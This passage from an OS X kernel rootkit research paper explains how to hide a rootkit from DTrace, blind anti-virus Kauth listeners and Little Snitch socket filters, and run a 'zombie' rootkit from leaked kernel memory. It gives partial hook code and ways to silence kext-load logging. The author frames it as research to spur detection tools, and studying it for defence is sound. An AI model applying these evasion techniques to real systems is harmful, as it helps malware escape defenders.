        systrace_getarg,
        NULL,
        systrace_destroy
};

systrace_enable() will modify sysent function pointers and redirect them
to dtrace_systrace_syscall(). Code snippet responsible for this:

(...)
 lck_mtx_lock(&dtrace_systrace_lock);
 if (sysent[sysnum].sy_callc == systrace_sysent[sysnum].stsy_underlying)
 {
    vm_offset_t dss = (vm_offset_t)&dtrace_systrace_syscall;
    ml_nofault_copy((vm_offset_t)&dss,
(vm_offset_t)&sysent[sysnum].sy_callc, sizeof(vm_offset_t));
 }
 lck_mtx_unlock(&dtrace_systrace_lock);
(...)

Attaching a kernel debugger and inserting a breakpoint on
systrace_enable() confirms this (keep in mind all these values include
ASLR slide of 0x24a00000):

Before:

gdb$ print *(struct sysent*)(0xffffff8025255840+5*sizeof(struct sysent))
$12 = {
  sy_narg = 0x3,
  sy_resv = 0x0,
  sy_flags = 0x0,
  sy_call = 0xffffff8024cfc210,          <- open syscall, sysent[5]
  sy_arg_munge32 = 0xffffff8024fe34f0,
  sy_arg_munge64 = 0,
  sy_return_type = 0x1,
  sy_arg_bytes = 0xc
}

dtrace_systrace_syscall is located at address 0xFFFFFF8024FDC630.

After enabling a 'syscall::open:entry' probe:

gdb$ print *(struct sysent*)(0xffffff8025255840+5*sizeof(struct sysent))
$13 = {
  sy_narg = 0x3,
  sy_resv = 0x0,
  sy_flags = 0x0,
  sy_call = 0xffffff8024fdc630,    <- now points to dtrace_systrace_syscall
  sy_arg_munge32 = 0xffffff8024fe34f0,
  sy_arg_munge64 = 0,
  sy_return_type = 0x1,
  sy_arg_bytes = 0xc
}

To recall DTrace's flow:
  User                          Kernel
open() -|-> unix_syscall64() -> dtrace_systrace_syscall -> open() syscall

What are the conclusions from all this? If only the sysent table function
pointers are modified by the rootkit, DTrace will be unable to directly
detect the rootkit using syscall provider. The modified pointer will
be copied by DTrace and return to it. DTrace is blind to the original
function because it does not exist anymore in the table, only inside
our modified version.

If we modify the syscall handler as described in 2.6 and do not update
the sysent references in DTrace related functions then DTrace usage will
signal the potential presence of a rootkit. DTrace is still referencing
the original sysent table and will modify it but the syscall handler is
not. The result is that DTrace syscall provider will never receive any
event. Conclusion: don't forget to fix those references, although the
functions that need to be patched are all static.


------[ 6.2.5.2 - fbt provider

fbt stands for function boundary tracing and allows tracing function entry
and exit of almost all kernel related functions (there is a small list of
untraceable functions called critical_blacklist [bsd/dev/i386/fbt_x86.c]).

The possibilities to detect malicious code using this provider are higher
due to its design and implementation. An example using rubilyn rootkit
is the best way to demonstrate this:

#dtrace -s /dev/stdin -c "ls /"
fbt:::entry
/pid == $target/
{
}
^D

Searching output for getdirentries64, without rootkit:

  0  99661             unix_syscall64:entry
  0  97082  kauth_cred_uthread_update:entry
  0  91985            getdirentries64:entry
  0  92677        vfs_context_current:entry

Now with rootkit loaded:

  0  99661             unix_syscall64:entry
  0  97082  kauth_cred_uthread_update:entry
  0   2119        new_getdirentries64:entry  <- hooked syscall!!!
  0  91985            getdirentries64:entry  <- original function
  0  92677        vfs_context_current:entry

A very simple trace is able to detect both the hooked syscall and the
call to original getdirentries64. Houston, we have a rootkit problem!

DTrace's fbt design and implementation are very interesting so let me
"briefly" go thru it to find a way to hide the rootkit.

fbt's design is explained in [23]:

"On x86, FBT uses a trap-based mechanism that replaces one of the
instructions in the sequence that establishes a stack frame (or one of
the instructions in the sequence that dismantles a stack frame) with an
instruction to transfer control to the interrupt descriptor table (IDT).
The IDT handler uses the trapping instruction pointer to look up the FBT
probe and transfers control into DTrace. Upon return from DTrace, the
replaced instruction is emulated from the trap handler by manipulating
the trap stack."

The source files we should focus on are bsd/dev/i386/fbt_x86.c and
bsd/dev/dtrace/fbt.c.

DTrace's OS X implementation is done using an illegal instruction opcode,
which is (usually) patched into the instruction that sets the base pointer
(EBP/RBP). The instruction is emulated inside DTrace and not re-executed
as it happens in debuggers using int3 breakpoints.

Memory dump example with getdirentries64:

Before activating the provider:

gdb$ x/10i 0xFFFFFF8024D01C20
0xffffff8024d01c20:  55                            push   rbp
0xffffff8024d01c21:  48 89 e5                      mov    rbp,rsp
0xffffff8024d01c24:  41 56                         push   r14
0xffffff8024d01c26:  53                            push   rbx

After:

# dtrace -n fbt::getdirentries64:entry

gdb$ x/10i 0xFFFFFF8024D01C20
0xffffff8024d01c20:  55                         push   rbp
0xffffff8024d01c21:  f0 89 e5                   lock mov ebp,esp <- patched
0xffffff8024d01c24:  41 56                      push   r14
0xffffff8024d01c26:  53                         push   rbx

The function that does all the work to find the patch location is
__provide_probe_64() [bsd/dev/i386/fbt_x86.c] (FBT_PATCHVAL defines the
illegal opcode byte).

Patching is done at fbt_enable() [bsd/dev/dtrace/fbt.c]:

if (fbt->fbtp_currentval != fbt->fbtp_patchval)
{
    (void)ml_nofault_copy((vm_offset_t)&fbt->fbtp_patchval,
(vm_offset_t)fbt->fbtp_patchpoint, sizeof(fbt->fbtp_patchval));

    fbt->fbtp_currentval = fbt->fbtp_patchval;
    ctl->mod_nenabled++;
}

The following diagram shows the trap handling of the illegal instruction:

Activate fbt Provider
       |
       v
  fbt_enable()
       |
       v
Invalid instruction
   exception
-------|-----------[ osfmk/x86_64/idt64.s ]
       v
  idt64_invop()
       |
       v
 hndl_alltraps()
       |
       v
trap_from_kernel()
-------|-----------[ osfmk/i386/trap.c ]
       v
  kernel_trap()
-------|-----------[ bsd/dev/i386/fbt_x86.c ]
       v
fbt_perfCallback()             (...)                    .-> emulate ->
-------|-----------[ bsd/dev/dtrace/dtrace_subr.c ]     | continue
       v                                                | instruction
  dtrace_invop()                                        |
-------|-----------[ bsd/dev/i386/fbt_x86.c ]           |
       v                                                |
   fbt_invop()                                          |
-------|-----------[ bsd/dev/dtrace/dtrace.c ]          |
       v                                                |
  dtrace_probe()                                        |
       |                                                |
       v                                                |
__dtrace_probe()                                        |
       |                                                |
       v                                                |
     (...) ---------------------------------------------

Dtrace is activated inside kernel_trap():
#if CONFIG_DTRACE
    if (__improbable(tempDTraceTrapHook != NULL)) {
        if (tempDTraceTrapHook(type, state, lo_spp, 0) == KERN_SUCCESS) {
            /*
             * If it succeeds, we are done...
             */
            return;
        }
    }
#endif /* CONFIG_DTRACE */

tempDTraceTrapHook is just a function pointer, which in fbt provider
case points to fbt_perfCallback [bsd/dev/i386/fbt_x86.c]. The latter
is responsible for calling the DTrace functionality and emulating the
patched instruction. The emulations depends on the type of patch that
was made - prologue (entry) or epilogue (return), and which instruction
was patched. These can be:

- MOV RSP, RBP
- POP RBP
- LEAVE
- Also NOPs used by the sdt provider (statically defined tracing)

This information is stored inside DTrace internal structures and returned
by the call to dtrace_invop():

emul = dtrace_invop(saved_state->isf.rip, (uintptr_t *)saved_state,
saved_state->rax);

It is not possible to just patch this call because the emul value
determines the type of emulation that needs to be executed after.

dtrace_invop is used by fbt and sdt providers and does nothing more than
calling function pointers contained in dtrace_invop_hdlr linked list
[bsd/dev/dtrace/dtrace_subr.c].

Continuing through the diagram...

fbt_invop is a good candidate to hijack and hide whatever we want from
DTrace. This can be done via a trampoline or modifying the function
pointer contained in dtrace_invop_hdlr list (symbol available in kernel).
From what I could test this list is initialised with the pointer to
fbt_invop() before any calls are made to fbt provider. In principle we
can modify it without waiting for initial DTrace execution.

int fbt_invop(uintptr_t addr, uintptr_t *state, uintptr_t rval)
{
    fbt_probe_t *fbt = fbt_probetab[FBT_ADDR2NDX(addr)];

    for (; fbt != NULL; fbt = fbt->fbtp_hashnext) {
        if ((uintptr_t)fbt->fbtp_patchpoint == addr) {

            if (fbt->fbtp_roffset == 0) {
                x86_saved_state64_t *regs = (x86_saved_state64_t *)state;

                CPU->cpu_dtrace_caller = *(uintptr_t
*)(((uintptr_t)(regs->isf.rsp))+sizeof(uint64_t)); // 8(%rsp)
                /* 64-bit ABI, arguments passed in registers. */
                dtrace_probe(fbt->fbtp_id, regs->rdi, regs->rsi, regs->rdx,
regs->rcx, regs->r8); // <---------- call to dtrace functionality --------
                CPU->cpu_dtrace_caller = 0;
            } else {
                dtrace_probe(fbt->fbtp_id, fbt->fbtp_roffset, rval, 0, 0,
0);
                CPU->cpu_dtrace_caller = 0;
            }
            return (fbt->fbtp_rval); <- the emul value
        }
    }
    return (0);
}

fbt_invop finds probed address information stored in fbt_probetab array
and enters DTrace probe code. The return value that is needed for the
emulation is stored inside the structure. To fiddle with DTrace we
can emulate this function or create a modified fbt_perfCallback, adding
conditions to hide our own addresses. It contains no private symbols so
this is an easy task.

Next, is a potential implementation of a hooked fbt_perfCallback function.
Please notice that all the necessary code is not implemented. It is a
mix of code and "algorithms".

kern_return_t
fbt_perfCallback_hooked(int trapno, x86_saved_state_t *tagged_regs,
                        uintptr_t *lo_spp, __unused int unused2)
{
    kern_return_t retval = KERN_FAILURE;
    x86_saved_state64_t *saved_state = saved_state64(tagged_regs);

    if (FBT_EXCEPTION_CODE == trapno && !IS_USER_TRAP(saved_state))
    {
        uintptr_t addr = saved_state->isf.rip;
        // XXX: verify if we want to hide this address
        //      remember that addr here is where illegal instruction
        //      occurred so our list must contain that info
        int addr_is_to_hide = hide_from_fbt(addr); // implement this
        if (addr_is_to_hide)
        {
            // XXX: find fbt_probetab symbol here so we can use it next

            // and now get the search starting point
            fbt_probe_t *fbt = fbt_probetab[FBT_ADDR2NDX(addr)];
            // find the structure for current addr
            for (; fbt != NULL; fbt = fbt->fbtp_hashnext)
            {
                if ((uintptr_t)fbt->fbtp_patchpoint == addr)
                {
                    // XXX: emulate all code inside fbt_perfCallback here
                    // except call to dtrace_invop()
                    // this is the code that is inside the first IF
                    // conditions in the original function a couple of
                    // symbols might need to be solved, easy!
                }
            }
            // add fail case here ? shouldn't be necessary unless a big
            // f*ckup occurs inside DTrace structures
        }
        // nothing to hide so call the original function
        else
        {
            kern_return_t ret = KERN_FAILURE;
            // XXX: don't forget we need to solve this symbol
            ret = fbt_perfCallback(trapno, tagged-regs, lo_spp, unused2);
            return ret;
        }
    }
    return retval;
}

Functions that we want to hide from DTrace will never reach its
probe system, effectively hiding them. The performance impact should
be extremely low unless there are too many functions to hide, and
hide_from_fbt() takes too long to execute.


----[ 6.3 - AV-Monster II

AV-Monster is a (old, Feb'12) PoC that exploits the Kauth interface
used by OS X anti-virus solutions [21]. Pardon me for bringing an old
subject to this paper but it perfectly illustrates an attack on Kauth,
and also because AV vendors, as far as I know, did nothing or very little
regarding this problem.

Apple recommends in [22] that anti-virus install Kauth listeners - they
can receive file events and pass them to the scan engine. The problem
is that this creates a single point of failure that we can (easily)
exploit to bypass the scan engine and remain undetectable (AV detection
effectiveness discussion is out of scope ;-)).

A very basic AV scanning workflow is:
Execute file -> Kauth generates event -> AV kext listener -> AV scan
engine

It illustrates at least two distinct possibilities to *easily* bypass
the anti-virus. One is to patch Kauth and the other to patch the kext
listener. The old PoC code just NOPs the listener callback to render
it inoperative - the scanning engine stops receiving any events. This is
too noisy! A stealth implementation should just hijack that step and hide
the files we want to, as it is done with hiding files in the filesystem.

This time let me show you how to attack Kauth's. The example will be based
on the KAUTH_FILEOP_OPEN action and open() syscall. To avoid unnecessary
browsing of XNU sources, this is the worflow up to the interesting point:

open() -> open_nocancel() -> open1()    [ bsd/vfs/vfs_syscalls.c ]
                               |
                               v
[ bsd/vfs/vfs_vnops.c ]  vn_open_auth() -> vn_open_auth_finish()
                                                    |
                                                    v
[ bsd/kern/kern_authorization.c ]        kauth_authorize_fileop()
                                                    |
                                                    v
                                        kauth_authorize_action()
                                                    |
                                                    v
                                             listener callback

I do not want to spam you with code but allow me to reprint the fileop
function:

int
kauth_authorize_fileop(kauth_cred_t credential, kauth_action_t action,
uintptr_t arg0, uintptr_t arg1)
{
        char            *namep = NULL;
        int             name_len;
        uintptr_t       arg2 = 0;

        /* we do not have a primary handler for the fileop scope so bail
         * out if there are no listeners.
         */
        if ((kauth_scope_fileop->ks_flags & KS_F_HAS_LISTENERS) == 0) {
                return(0);
        }

        if (action == KAUTH_FILEOP_OPEN || action == KAUTH_FILEOP_CLOSE ||
action == KAUTH_FILEOP_EXEC) {
            /* get path to the given vnode as a convenience to our
             * listeners.
             */
                namep = get_pathbuff();
                name_len = MAXPATHLEN;
                if (vn_getpath((vnode_t)arg0, namep, &name_len) != 0) {
                        release_pathbuff(namep);
                        return(0);
                }
                if (action == KAUTH_FILEOP_CLOSE) {
                        arg2 = arg1;  /* close has some flags that come in
via arg1 */
                }
                arg1 = (uintptr_t)namep;
        }
        kauth_authorize_action(kauth_scope_fileop, credential, action,
arg0, arg1, arg2, 0);

        if (namep != NULL) {
                release_pathbuff(namep);
        }
        return(0);
}

The purpose of this function is to retrieve some useful data to the
listener. In this case it is the vnode reference of the file and its
full path. Apple's documentation confirms it:

KAUTH_FILEOP_OPEN  Notifies that a file system object (a file
or directory) has been opened. arg0 (of type vnode_t) is a vnode
reference. arg1 (of type (const char *)) is a pointer to the object's
full path.

It is clear now that this is a great place to hijack and hide files
we do not want the AV to scan (or some other listener - this is also a
good feature for a file monitor). We just need to verify if current file
matches our list and return 0 if positive, else call the original code
(all these functions are not static so we can easily find the symbols).

And that's it. Simple, uh? :-)


----[ 6.4 - Little Snitch

Little Snitch is a popular application firewall that can blow up the
rootkit cover if network communications are needed and its not taken
care of (nobody likes a snitch!). Socket filters is the OS X feature that
enables Little Snitch to easily intercept and control (network) sockets
without need for hooking or any other (unstable/dubious) tricks. They
can filter inbound or outbound traffic on a socket and also out-of-band
communication [17].

The installation of a socket filter is done using the sflt_register()
function, for each domain, type, and protocol socket. Little Snitch
loops to install the filter in all possible socket combinations.

extern errno_t sflt_register(const struct sflt_filter *filter,
                             int domain,
                             int type,
                             int protocol);

The interesting detail of sflt_register() is the sflt_filter structure
[bsd/sys/kpi_socketfilter.h]. It contains a series of callbacks for
different socket operations:

struct sflt_filter {
 sflt_handle                     sf_handle;
 int                             sf_flags;
 char                            *sf_name;
 sf_unregistered_func            sf_unregistered;
 sf_attach_func                  sf_attach; // handles attaches to sockets.
 sf_detach_func                  sf_detach;
 sf_notify_func                  sf_notify;
 sf_getpeername_func             sf_getpeername;
 sf_getsockname_func             sf_getsockname;
 sf_data_in_func                 sf_data_in; // handles incoming data.
 sf_data_out_func                sf_data_out;
 sf_connect_in_func              sf_connect_in; // handles inbound
 connections.
 sf_connect_out_func             sf_connect_out;
 sf_bind_func                    sf_bind; // handles binds.
 (...)
}

History repeats itself and once again the easiest way is to hook
the function pointers and do whatever we want. Little Snitch driver
(it's an I/O Kit driver and not a kernel extension) loads very early so
hooking sflt_register() and modifying the structure on the fly is not
very interesting. We need to lookup the structure in kernel memory and
modify it.

Many different socket filters can be attached to the same socket so there
must be a data structure holding this information. The interesting source
file is bsd/kern/kpi_socketfilter.c, where a tail queue is created and
referenced using a static variable sock_filter_head.

struct socket_filter {
        TAILQ_ENTRY(socket_filter)      sf_protosw_next;
        TAILQ_ENTRY(socket_filter)      sf_global_next;
        struct socket_filter_entry      *sf_entry_head;

        struct protosw                  *sf_proto;
        struct sflt_filter              sf_filter;
        u_int32_t                       sf_refcount;
};

TAILQ_HEAD(socket_filter_list, socket_filter);
static struct socket_filter_list        sock_filter_head;

There are a few functions referencing sock_filter_head and
the disassembler can be helpful to find the correct location
(sflt_attach_internal() is a good candidate). Using gdb attached to
kernel and sock_filter_head address:

gdb$ print *(struct socket_filter_list*)0xFFFFFF800EAAC9F8
$1 = {
  tqh_first = 0xffffff8014811f08,
  tqh_last = 0xffffff8014898e18
}

(sock_filter_head located at 0xFFFFFF80008AC9F8 in 10.8.2 plus KASLR of
0xe200000 in this example)

Iterating around the tail queue we find the Little Snitch socket filter:

gdb$ print *(struct socket_filter*)0xffffff801483e608
$7 = {
  sf_protosw_next = {
    tqe_next = 0x0,
    tqe_prev = 0xffffff8014811f08
  },
  sf_global_next = {
    tqe_next = 0xffffff801483e508,
    tqe_prev = 0xffffff801483e718
  },
  sf_entry_head = 0xffffff801b29a1c8,
  sf_proto = 0xffffff800ea2bca0,
  sf_filter = {
    sf_handle = 0x27e3ea,
    sf_flags = 0x5,
    sf_name = 0xffffff7f8eb1357b "at_obdev_ls",
    sf_unregistered = 0xffffff7f8eb0938f,
    sf_attach = 0xffffff7f8eb093f9,
    sf_detach = 0xffffff7f8eb09539,
    sf_notify = 0xffffff7f8eb095e8,
    sf_getpeername = 0xffffff7f8eb096a4,
    sf_getsockname = 0xffffff7f8eb09707,
    sf_data_in = 0xffffff7f8eb0974f,
    sf_data_out = 0xffffff7f8eb09bfa,
    sf_connect_in = 0xffffff7f8eb0a076,
    sf_connect_out = 0xffffff7f8eb0a295,
    sf_bind = 0xffffff7f8eb0a446,
    sf_setoption = 0xffffff7f8eb0a4ff,
    sf_getoption = 0xffffff7f8eb0a547,
    sf_listen = 0xffffff7f8eb0a58f,
    sf_ioctl = 0xffffff7f8eb0a612,
    sf_ext = {
      sf_ext_len = 0x38,
      sf_ext_accept = 0xffffff7f8eb0a65a,
      sf_ext_rsvd = {0x0, 0x0, 0x0, 0x0, 0x0}
    }
  },
  sf_refcount = 0x17
}

The sf_name field from sflt_filter structure can be used to match
the correct socket filter, otherwise we would have to find the driver
addresses and match the function pointers that belong to that address
space.

Different possibilities exist to hide our network connections
from Little Snitch and also Apple's application firewall (named
com.apple.nke.applicationfirewall). The easiest one is to patch or
hook the sf_attach callback. Documentation from the previously mentioned
include file:

/*!
 @typedef sf_attach_func

 @discussion sf_attach_func is called to notify the filter it has been
attached to a socket. The filter may allocate memory for this attachment
and use the cookie to track it. This filter is called in one of two cases:
  1) You've installed a global filter and a new socket was created.
  2) Your non-global socket filter is being attached using the SO_NKE
socket option.
 @param cookie Used to allow the socket filter to set the cookie for this
attachment.
 @param so The socket the filter is being attached to.
 @result If you return a non-zero value, your filter will not be attached
to this socket.
*/
typedef errno_t (*sf_attach_func)(void  **cookie, socket_t so);

Forcing the callback to return a non-zero value will effectively take
socket filter firewalls out of the equation. The problem here is that
the socket_t structure might not have enough information to distinguish
the cases we want to hide - it is too early in the process so there is
no address to connect to. There are two fields that contain the PID
information of the last process to interact with the socket so this can
be useful if we already know the PID to hide connection from/to.

The other callbacks contain "richer" information for our purposes,
in particular the structure sockaddr. If you want/need this type of
fine-grain control you should hook here and use that structure to
make your hide or not decision. As an exercise, to dump the target
address you can attach gdb to the kernel and use the kgmacros command
"showsockaddr" on that argument address (assuming you are breakpointing
at the callback address).

Another piece of information that can be used to control which process
is related to the current socket the is the cookie that is set on attach
callback and passed along to almost all other callbacks. The cookie is a
user-defined structure and the following is a partial reverse of Little
Snitch's definition:

struct Cookie
{
(...)
0x48: IOLock *lock;
0x74: pid_t pid; // process to whom the socket belongs to
0x78: int32_t count;
0x7C: int32_t *xxx;
0x80: int32_t protocol;
0x85: int8_t domain;
0x86: int8_t type;
(...)
}

As in Kauth, the socket filters create a single point of failure where we
can easily hook and filter our "evil" connections. The real difficulty is
to find the head of the socket filter tail queue. Having a disassembler
in the rootkit makes this a easy task, opening the door to easily bypass
application firewalls.


----[ 6.5 - Zombie rootkits

The idea here is to explore kernel memory allocations and leaks. Kernel
and kernel extensions share the same memory map, kernel_map, and there
are a few kernel functions "families" to allocate kernel memory:

- kalloc.
- kmem_alloc.
- OSMalloc.
- MALLOC/FREE.
- IOMalloc/IOFree for I/O Kit.

All functions are wrappers for kernel_memory_allocate(). For additional
information check [30], [31] Chapter 6, [13] Chapter 12.

My initial (too complicated idea) was to load the rootkit, hook whatever
was needed, unload the rootkit, and then protect the memory that was
used. This was based in the fact that unloading does not destroy the
rootkit memory so everything would work as long those blocks of memory
were not reallocated to something else. I wanted to edit with kernel
memory map and mark those pages as used.

If we have a rootkit running that is not associated with a kernel
extension we kind of have a zombie rootkit and solve a few problems such
as no need to hide from kextstat, no kernel extension structures to find,
etc. I later found out that Hoglund and Butler had a similar idea in
[32] when they describe the NonPagedPool memory trick - allocate memory
in that area, copy the rootkit, and unload the driver. New ideas are
tough to have :-).

Back to the original point...
Simple things usually work better so there is no point in starting with
the complicated method. The easiest way is to create a memory leak and
use it to store the zombie rootkit version. When the original kernel
extension is unloaded all the memory that was previously allocated using
one of the functions above (tested with kalloc and _MALLOC) will not be
free'd, creating a kernel memory leak that we can abuse and profit from.

The beloved ASCII diagram:

load rootkit -> find rootkit -> calculate rootkit -> alloc zombie
                base address          size             memory
                                                          |
                                                          v
unload original <- transfer control <- fix memory <- copy rootkit into
   rootkit            to zombie        protections     zombie memory

To unload the original rootkit is extremely easy - we do not need to
execute any additional command, just return KERN_FAILURE from the start
function and rootkit will not be loaded. The zombie rootkit already
gained control before this so there is no problem and we avoid to execute
a kextunload command. Simple :-).

The control transfer to zombie code has a small caveat that inherits
from previous paragraph - the start function must return a value so we
can't simple jump into the zombie. Two ideas come to my mind to solve
this problem; first we can hook some kernel function and there transfer
control to zombie, second we can use kernel threads - create a new thread
and let the main one return.

To create a kernel thread the function kernel_thread_start() can be used
(include <kern/thread.h> and Mach KPI). Its prototype is:

kern_return_t
kernel_thread_start(thread_continue_t continuation, void *parameter,
thread_t *new_thread);

Continuation parameter is a C function pointer where new thread will start
execution, parameter is data that we might want to pass to the new thread,
and new_thread a thread reference that the caller is responsible for.

The zombie thread start function should have a prototype like this:

void start_thread(void *parameter, wait_result_t wait)

To set the start function pointer we need to find that function address
in the zombie memory. Symbol information is not available (__LINKEDIT
segment is not loaded) and to avoid reading from the filesystem we can
use a quick trick - find the rootkit base address and find the difference
to the address of start function in the rootkit (since that is in the
original rootkit code). Since we have the zombie start address returned
from the memory allocation, we just need to add the difference and we
have the location of the start function inside the zombie. Computed the
function pointer we can now pass it to kernel_thread_start() and be sure
that zombie code will execute.

Next problem...

Copying the original rootkit into the new area invalidates the external
symbols solved when kernel extension was loaded. Kernel extension code
is position independent (PIC) so calls are made referencing the current
instruction address. If we modify the location address and maintain
the offset, then the symbol is not valid anymore and most probably will
generate a kernel panic when executed.

Example:
Rootkit loaded in memory:
gdb$ x/10i 0xffffff7f83ad671c
0xffffff7f83ad671c:  55                        push   rbp
0xffffff7f83ad671d:  48 89 e5                  mov    rbp,rsp
0xffffff7f83ad6720:  48 8d 3d d1 09 00 00      lea    rdi,[rip+0x9d1]
# 0xffffff7f83ad70f8 <- string reference
0xffffff7f83ad6727:  30 c0                     xor    al,al
0xffffff7f83ad6729:  5d                        pop    rbp
0xffffff7f83ad672a:  e9 61 29 35 7f            jmp    0xffffff8002e29090 <-
call to kernel's printf, solved when kext was loaded

The zombie copy:
gdb$ x/10i 0xffffff80392ba724
0xffffff80392ba724:  55                        push   rbp
0xffffff80392ba725:  48 89 e5                  mov    rbp,rsp
0xffffff80392ba728:  48 8d 3d d1 09 00 00      lea    rdi,[rip+0x9d1]
# 0xffffff80392bb100 <- string reference will be valid
0xffffff80392ba72f:  30 c0                     xor    al,al
0xffffff80392ba731:  5d                        pop    rbp
0xffffff80392ba732:  e9 61 29 35 7f            jmp    0xffffff80b860d098 <-
this is a random address and will crash when we call this Function

I am not sure if there is a better solution but I opted out to manually
fix the offsets in the zombie code (probably influenced by the quick
trick to find the thread start function). My idea is to build a table
of all external symbols we will need to fix (hardcoded string table or
read kext symbol tables from disk) and solve their addresses. With this
information we can disassemble the kernel and find all references, and
also compute the (references's) difference to the rootkit base address.

The final step is to fix the offsets in the zombie references. We
have the difference for each reference so we can calculate where each
reference is located in the zombie memory and recompute the new offset
to the external symbol. References to the __DATA segment do not need to
be fixed - the offsets remain valid since that segment was copied and
relative distance remains the same. Maybe a bit too much work but the
disassembler engine makes this rather easy to accomplish. If you have
a better solution I am eager to read about it.

Returning KERN_FAILURE to kextload will generate noisy log messages
about the rootkit.

/var/log/system.log:
May  7 02:26:10 mountain-lion-64.local com.apple.kextd[12]: Failed to load
/Users/reverser/the_flying_circus.kext - (libkern/kext) kext (kmod)
start/stop routine failed.

dmesg:
Kext put.as.the-flying-circus start failed (result 0x5).
Kext put.as.the-flying-circus failed to load (0xdc008017).
Failed to load kext put.as.the-flying-circus (error 0xdc008017).

The dmesg output can be silenced by temporarily patching OSKextLog
function or by directly memory patching the binaries that call this
function. The fastest and easiest way is to do it inside the kernel -
solve the symbol and patch the first instruction to a ret. After rootkit
is loaded we can restore original byte and everything is back to normal.

The syslog output is generated by kextd daemon. Two quick solutions
come to my mind - one is to patch syslogd as described before, another
is to patch kextd. The symbol used to send the message to syslogd
is asl_vlog. It is an external symbol in kextd. The symbol stub can
be temporarily patched into a ret to avoid failure logging. Find the
kextd process from process list, process its Mach-O header and locate
the symbol stub address in __stubs section. Nothing very complicated!

To detect when to restore the logging features, we can use a quick and
dirty hack. Loop inside the zombie thread until kextload process is
finished. Then the original bytes can be restored and its business as
usual but with a zombie rootkit loaded.

The foundation blocks to zombie rootkits are exposed, the remaining are
implementation details that do not matter much here and can be found in
the attached sample code.


--[ 7 - Caveats & Detection

Writing rootkits is a dangerous and unstable game and that is why it is
such a fun game (or work for those doing it for money). You are always
at mercy of subtle or major changes that can ruin all your efforts and
uncloak your toy. Nevertheless, these are the same reasons why writing
rootkits is so fun - you need to make it as stable and future-proof
as possible, and try to think in all different detection paths. It
is a never-ending story, quite frustrating at times but mentally and
creatively challenging.

This paper is considerably huge but still incomplete! There are a few
missing areas and you probably spotted a few problems with some of its
approaches. Let me try to describe some.

One of the main problems is the dependency on proc, task and some other
structures. These are opaque to outsiders for one good reason - they
are changed frequently between major OS X versions. For example, when I
was researching I forgot to include a define and things were not working
(lucky or not it was not crashing the test system). Three different proc_t
(and task_t) versions must be included to create a rootkit compatible
with the three latest major OS X versions. And it is most certain that
it will break with a new major release.

In practice there is at least one rather easy way to overcome this
difficulty. The effective number of fields required from proc and task
structures is small. We can resort to information "leaks" from functions
referencing those fields and retrieve the structure offset. Including a
disassembler in the rootkit makes this task easier and safer. There are
many suitable functions - small, stable, and with very few different
structures and variables. Many are static, but the number of exported
ones are more than enough for this purpose.

Filesystem checks (offline in particular) are a significant threat
to rootkits, especially when there is a good reference baseline. Good
rootkits must try to keep their filesystem (and memory) footprint to a
minimum. One of the usual weakest points is the rootkit startup. It must
be initialised somewhere! OS X features so many places where this can
happen but this information is available to both defensive and offensive
sides. Binaries modification (for example, kernel extension injection
as featured in last Phrack) is a good method but (easily) detectable by
checksum checks.

Regarding this problem, we can try to abuse additional features. OS X
contains many data files that are mutable (sqlite3 databases, for example)
and by nature difficult to checksum. A potential vulnerability using
these data files could be explored and all the rootkit code stored
there. Nothing new here, just remembering additional attacking and
storage points.

Extreme care is required with rootkit's code - it must be as bug free
as possible so that any inconsistencies and/or bugs do not reveal its
presence, and must be carefully designed, for example, authentication
and encryption on all communications. It is quite a joke that a simple
ioctl call can expose OS.X/Crisis [4]. There is a "rule" - if it runs,
it can be reversed. But lets not make that so easy, ok?

Duplicating functions to use with the trampoline trick is also a
potential source of problems if those functions are changed in new
versions. This can be avoided by using the original functions - modify
the call references or hijack the function and return to the original
one. Using the NOP alignment space allows us to keep pointers and
references inside the kernel memory address space and less suspicious
to an initial analysis.

Detection and creation of tools is the next logical step. OS X lacks this
kind of tools and here lies a good opportunity for future research and
development. The defensive side against rootkits is even more challenging
and requires additional creativity (and maybe kernel knowledge) to
develop safer and reliable detection methods. The challenge is issued :-).


--[ 8 - Final words

This was a long paper and I sincerely hope it was useful in some way
to you who had the time and patience to read it. New ideas are hard to
come by and there (probably) are many here that were somehow previously
explored by others. Please apologize me if missing attribution - it
is only because I do not know or I am not aware who is the original
author/source. It is particularly difficult when you read so much stuff
thru the years.

The full disclosure discussion is extremely complicated and impossible to
reach consensus. Full source code is hereby released because I believe
it is the only (viable) alternative to move things forward and call
for additional research and solutions. OS X is a great platform but it
(still) suffers from a invincibility mystique that it is false and
dangerous. There are companies producing commercial rootkits sold to
governments to potentially spy on citizens (they say criminals, we have
no idea since there is no transparency).

Obviously these  tools can be used for legitimate purposes (such as
tracking real bad guys) but also no so legitimate - power corrupts and
temptation is too big to spy and control everyone. A balance is required
and it can come from improved research and defensive tools. Scoffing
at the low incentives or potential difficulties is not the solution -
history has shown that there is always someone who will leap forward
and break the establishment.

This paper's goal is not to assist in developing a surveillance dissident
death machine (name kindly suggested by thegrugq!) but to show the
different ways it can be built, and how to detect and protect against
them. I can't avoid its potential bad usage but at least it should make
the playing field a bit more balanced.

Greets to nemo, noar, snare, all my put.as friends (saure, od, spico,
kahuna, emptydir, korn, g0sh, ...), thegrugq, diff-t, tal0n and everyone
else at C., the blog readers and #osxre boys & girls.

And a big middle finger to Apple as a company, born from the hacking
spirit and now transformed against hacking.

Enjoy & have fun,
fG!


--[ 9 - References

[1] ghalen and wowie, Developing Mac OSX kernel rootkits
    http://www.phrack.org/issues.html?issue=66&id=16&mode=txt

[2] prdelka, Rubilyn 0.0.1
    http://www.nullsecurity.net/tools/backdoor.html

[3] 0xfeedbeef, volafox : rubilyn Rootkit Analysis
    http://feedbeef.blogspot.pt/2012/10/volafox-rubilyn-rootkit-analysis.ht
    ml

[4] fG!, Tales from Crisis
    http://reverse.put.as/2012/08/06/tales-from-crisis-chapter-1-the-droppe
    rs-box-of-tricks/

[5] snare, Resolving kernel symbols
    http://ho.ax/posts/2012/02/resolving-kernel-symbols/

[6] Landon Fuller - Fixing ptrace(pt_deny_attach, ...) on Mac OS X 10.5
    Leopard, http://landonf.bikemonkey.org/code/macosx/Leopard_PT_DENY_ATTA
    CH.20080122.html

[7] Miller, Charlie & Zovi, Dino Dai, The Mac Hacker's Handbook
    Wiley Publishing, 2009, ISBN: 978-0-470-39536-3

[8] Wikipedia, Interrupt descriptor table
    http://en.wikipedia.org/wiki/Interrupt_descriptor_table

[9] fG!, bruteforcesysent
    https://github.com/gdbinit/bruteforcesysent

[10] OS X ABI Mach-O File Format Reference
     https://developer.apple.com/library/mac/#documentation/developertools/
     conceptual/MachORuntime/Reference/reference.html

